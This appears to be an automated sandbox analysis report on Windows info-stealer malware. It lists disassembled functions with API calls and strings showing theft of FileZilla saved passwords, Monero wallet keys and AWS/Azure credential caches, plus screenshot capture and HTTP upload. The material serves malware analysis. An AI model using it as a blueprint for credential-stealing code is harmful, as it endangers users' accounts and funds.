                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0a^o
                                    • API String ID: 0-1632602809
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %p}u
                                    • API String ID: 0-1487366728
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 97?
                                    • API String ID: 0-648382171
                                    • Opcode ID: 24fed6cf9bd6923ad5ce1713b00eff0cb572519da376d2cc1bd1ed6cc32bf95c
                                    • Instruction ID: 6eeec9333e99187d3c53997250e21fd523ae4c3fd7d2650b4192210bbe8b4883
                                    • Opcode Fuzzy Hash: 24fed6cf9bd6923ad5ce1713b00eff0cb572519da376d2cc1bd1ed6cc32bf95c
                                    • Instruction Fuzzy Hash: 40517CF3A0C3099FD304BEBDFC8552BBBD9E758164F29063CEA85C2705F921DA095652
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: I|s_
                                    • API String ID: 0-1702182863
                                    • Opcode ID: 1cc03c3252c42c46eb3e6033cfe272536fc868e385378dbdc307c1658b43eb7a
                                    • Instruction ID: d2966b8c39da8eae4b1a2461be06b7821f562855acd28b59fbdc5f90ee02f3a5
                                    • Opcode Fuzzy Hash: 1cc03c3252c42c46eb3e6033cfe272536fc868e385378dbdc307c1658b43eb7a
                                    • Instruction Fuzzy Hash: 0F5159F3A082149FE304AE2DEC857ABB7E5EB94760F1B403DD6C883744EA75590487C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 085677320a2a56f5a34df5a3b91df81f312b86375ef4535c8aa5fd8b44862097
                                    • Instruction ID: 1221aead7112f6d255d73c966d450b0860da4bbc40728ed3b91b2413d5929e3e
                                    • Opcode Fuzzy Hash: 085677320a2a56f5a34df5a3b91df81f312b86375ef4535c8aa5fd8b44862097
                                    • Instruction Fuzzy Hash: 40614AF3A183045BE304AE38EC95777BBD9DB94360F2A453EEA84D7780E53989418396
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 708d910c49fb7771ed35d5e5cd5bf7f723f3e6282029feeb34011e0200fb2f16
                                    • Instruction ID: a23db97b2b3e9702ad2821e8fb0e22c0c2f341ba43d5f3ec2e21be1d57363ada
                                    • Opcode Fuzzy Hash: 708d910c49fb7771ed35d5e5cd5bf7f723f3e6282029feeb34011e0200fb2f16
                                    • Instruction Fuzzy Hash: D5515DB3E5112547F3544979CC583A2A2939BE1324F2F82788E6CAB7C6DD7E5C0A53C4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 836ee2bad583c20309243c9172a11e8d478b94b1f09814404f681801c476150a
                                    • Instruction ID: a1d9fe06f335e99a2b6d31840eb26806712894b170f2c169db2497fe7808a0e0
                                    • Opcode Fuzzy Hash: 836ee2bad583c20309243c9172a11e8d478b94b1f09814404f681801c476150a
                                    • Instruction Fuzzy Hash: 8D5149F361D3049FE3005E29ECC47BBB7D9EB94720F294A3DE98847784E9395C058696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 465f90c8c30a93bb6a4ff3a5fbe9078bf38ca1ca1d934985e1098b4b9d313c6b
                                    • Instruction ID: 7522c2c8b9f58713d7133914af27c3ee25b705f56ca5b1fd241ff46a4c750680
                                    • Opcode Fuzzy Hash: 465f90c8c30a93bb6a4ff3a5fbe9078bf38ca1ca1d934985e1098b4b9d313c6b
                                    • Instruction Fuzzy Hash: 5831CDB251C604DFD3447E14DC4573EB7EAAB54320F1A892FEBD687204E6385A118A8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1fb84debca960272c0f6da860ee28de8fb0002856c228fec649698fb58065195
                                    • Instruction ID: 9607960c87680b77490f8461b34903151530aff5892ec2bf36c21f8ef4dac671
                                    • Opcode Fuzzy Hash: 1fb84debca960272c0f6da860ee28de8fb0002856c228fec649698fb58065195
                                    • Instruction Fuzzy Hash: 66217CA394DB2C9FD20CB9B95C48527BB9DA798650F270339F8C2C7700F65199318693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00C50DBA,00C50DB7,00C50DB6,00C50DB3), ref: 00C40362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C40369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C40385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C403CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C403DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00C40419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C40463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C40532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C40562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00C40571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00C40580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C40593
                                    • lstrcat.KERNEL32(?,00C51678), ref: 00C405A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C405B5
                                    • lstrcat.KERNEL32(?,00C5167C), ref: 00C405C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 00C405D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C405E6
                                    • lstrcat.KERNEL32(?,00C51688), ref: 00C405F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00C40604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C40617
                                    • lstrcat.KERNEL32(?,00C51698), ref: 00C40626
                                    • lstrcat.KERNEL32(?,00C5169C), ref: 00C40635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C50DB2), ref: 00C4068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 2cad0b9879bd69af7b338bf906dfacac5deedc22e85b89744e7247b599c3dcd5
                                    • Instruction ID: cc8db71556b5c6d58cd8954a943bd59e179af968721cc3ec84051e86c78e37a0
                                    • Opcode Fuzzy Hash: 2cad0b9879bd69af7b338bf906dfacac5deedc22e85b89744e7247b599c3dcd5
                                    • Instruction Fuzzy Hash: E0D14175940208AFDB04EBF0DD9AEEE7378FF54301F544428F506B6091DE34AA4AEB66
                                    APIs
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                      • Part of subcall function 00C347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                      • Part of subcall function 00C347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C359F8
                                    • StrCmpCA.SHLWAPI(?,019DE580), ref: 00C35A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C35B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,019DE460,00000000,?,019D9C98,00000000,?,00C51A1C), ref: 00C35E71
                                    • lstrlen.KERNEL32(00000000), ref: 00C35E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C35E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C35E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00C35EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00C35ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C35EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00C35F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C35F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C35F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00C35FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00C35FBD
                                    • HttpOpenRequestA.WININET(00000000,019DE520,?,019DDC28,00000000,00000000,00400100,00000000), ref: 00C35BF8
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00C35FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: 93e79df387191bd7cec30426fcd251d0598ea8d5f7465ccc03027ea0c6ac19ef
                                    • Instruction ID: 3b946cdfe3b9532d809f58bb7fcb21a6690af405d074cbca3e523761e77ff5ad
                                    • Opcode Fuzzy Hash: 93e79df387191bd7cec30426fcd251d0598ea8d5f7465ccc03027ea0c6ac19ef
                                    • Instruction Fuzzy Hash: 5D121E71860118ABEB15EBA0DC95FEEB378FF54700F5041A9F50A72091EF702A89DF65
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C3D0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C3D0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D208
                                    • lstrcat.KERNEL32(?,00C51478), ref: 00C3D217
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D22A
                                    • lstrcat.KERNEL32(?,00C5147C), ref: 00C3D239
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D24C
                                    • lstrcat.KERNEL32(?,00C51480), ref: 00C3D25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D26E
                                    • lstrcat.KERNEL32(?,00C51484), ref: 00C3D27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D290
                                    • lstrcat.KERNEL32(?,00C51488), ref: 00C3D29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D2B2
                                    • lstrcat.KERNEL32(?,00C5148C), ref: 00C3D2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C3D2D4
                                    • lstrcat.KERNEL32(?,00C51490), ref: 00C3D2E3
                                      • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                      • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                    • lstrlen.KERNEL32(?), ref: 00C3D32A
                                    • lstrlen.KERNEL32(?), ref: 00C3D339
                                      • Part of subcall function 00C4AA70: StrCmpCA.SHLWAPI(019D8950,00C3A7A7,?,00C3A7A7,019D8950), ref: 00C4AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: d7c4776633c34db7c334536dc92cb9642523cb9594c60b3b0ce9323bc8cb7ddc
                                    • Instruction ID: 597b9e2062b1357d32b17752a68ebd4feea29081937fc63a088b01a4fff551c1
                                    • Opcode Fuzzy Hash: d7c4776633c34db7c334536dc92cb9642523cb9594c60b3b0ce9323bc8cb7ddc
                                    • Instruction Fuzzy Hash: 7CE14C71950108AFEB08EBA1DD9AEEE7378FF54301F144168F507B6091DF34AA49EB62
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,019DCA08,00000000,?,00C5144C,00000000,?,?), ref: 00C3CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C3CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00C3CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C3CAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C3CAD9
                                    • StrStrA.SHLWAPI(?,019DCA20,00C50B52), ref: 00C3CAF7
                                    • StrStrA.SHLWAPI(00000000,019DCA68), ref: 00C3CB1E
                                    • StrStrA.SHLWAPI(?,019DD038,00000000,?,00C51458,00000000,?,00000000,00000000,?,019D8940,00000000,?,00C51454,00000000,?), ref: 00C3CCA2
                                    • StrStrA.SHLWAPI(00000000,019DD398), ref: 00C3CCB9
                                      • Part of subcall function 00C3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                      • Part of subcall function 00C3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                    • StrStrA.SHLWAPI(?,019DD398,00000000,?,00C5145C,00000000,?,00000000,019D8820), ref: 00C3CD5A
                                    • StrStrA.SHLWAPI(00000000,019D8B50), ref: 00C3CD71
                                      • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                      • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                      • Part of subcall function 00C3C820: lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                    • lstrlen.KERNEL32(00000000), ref: 00C3CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 00C3CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                    • String ID:
                                    • API String ID: 3744635739-3916222277
                                    • Opcode ID: d207f492f4c4d2d26de7356502b87fd55331ecd1e82ac897184ae20c09bcdd4c
                                    • Instruction ID: aa2e412faa7a1153bb2fb861898d7d5f1f3fd1ec9ff7bd4339f122c1531ab89b
                                    • Opcode Fuzzy Hash: d207f492f4c4d2d26de7356502b87fd55331ecd1e82ac897184ae20c09bcdd4c
                                    • Instruction Fuzzy Hash: 48E1FC71950108AFEB14EBA0DC96FEEB778FF54300F444169F506B6191EF306A8ADB62
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • RegOpenKeyExA.ADVAPI32(00000000,019DAE20,00000000,00020019,00000000,00C505B6), ref: 00C483A4
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C48426
                                    • wsprintfA.USER32 ref: 00C48459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C4847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C4848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C48499
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                    • Instruction ID: 2ceb71322006e354ce8cb2ac69abd507c3578fcc0e2e5a13591771481cb056e7
                                    • Opcode Fuzzy Hash: 26b44ce7e1045f8840a5c56a5a91d38c64286ab64a5d02d3683a91d9e8fbcffd
                                    • Instruction Fuzzy Hash: 7D81FBB1950118AFEB28DB54CC95FEEB7B8FF48700F008299E509A6180DF716B89CF95
                                    APIs
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44DB0
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 00C44DCD
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                      • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44E3C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 00C44E59
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                      • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                      • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44EC8
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C44EE5
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449B0
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C508D2), ref: 00C449C5
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C449E2
                                      • Part of subcall function 00C44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C44A1E
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,019DE510), ref: 00C44A4A
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FF8), ref: 00C44A5C
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A70
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,00C50FFC), ref: 00C44A82
                                      • Part of subcall function 00C44910: lstrcat.KERNEL32(?,?), ref: 00C44A96
                                      • Part of subcall function 00C44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C44AAC
                                      • Part of subcall function 00C44910: DeleteFileA.KERNEL32(?), ref: 00C44B31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 98e09673bc85d6adf9beadf9fd1df2ee052f7efbf9db2a83c02b6f88076660b9
                                    • Instruction ID: eaf8a344e1c96e3522e75e6e5296f063268d9575cc7a0b0cda1d6590d02d6bd9
                                    • Opcode Fuzzy Hash: 98e09673bc85d6adf9beadf9fd1df2ee052f7efbf9db2a83c02b6f88076660b9
                                    • Instruction Fuzzy Hash: 9D41A67A9402046BD754F7B0DC4BFED3338AB64701F044464BA49A60C1EEB49BCDDB92
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C4906C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg
                                    • API String ID: 2244384528-3785015651
                                    • Opcode ID: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                    • Instruction ID: 0c4975aa578897efcbc270441f062e2a61be49fdf1c2f49e99e521e1a1946bdc
                                    • Opcode Fuzzy Hash: 6a70c9083a62d0b9846de7b2c33636ea74cd36e5fec9d6b9040a3447aad30326
                                    • Instruction Fuzzy Hash: 5F71EC71910208AFDB14EFE5DC89FEEB7B8FB88700F148518F519A7290DB74A945CB61
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C431C5
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C4335D
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C434EA
                                    Strings
                                    Memory Dump Source
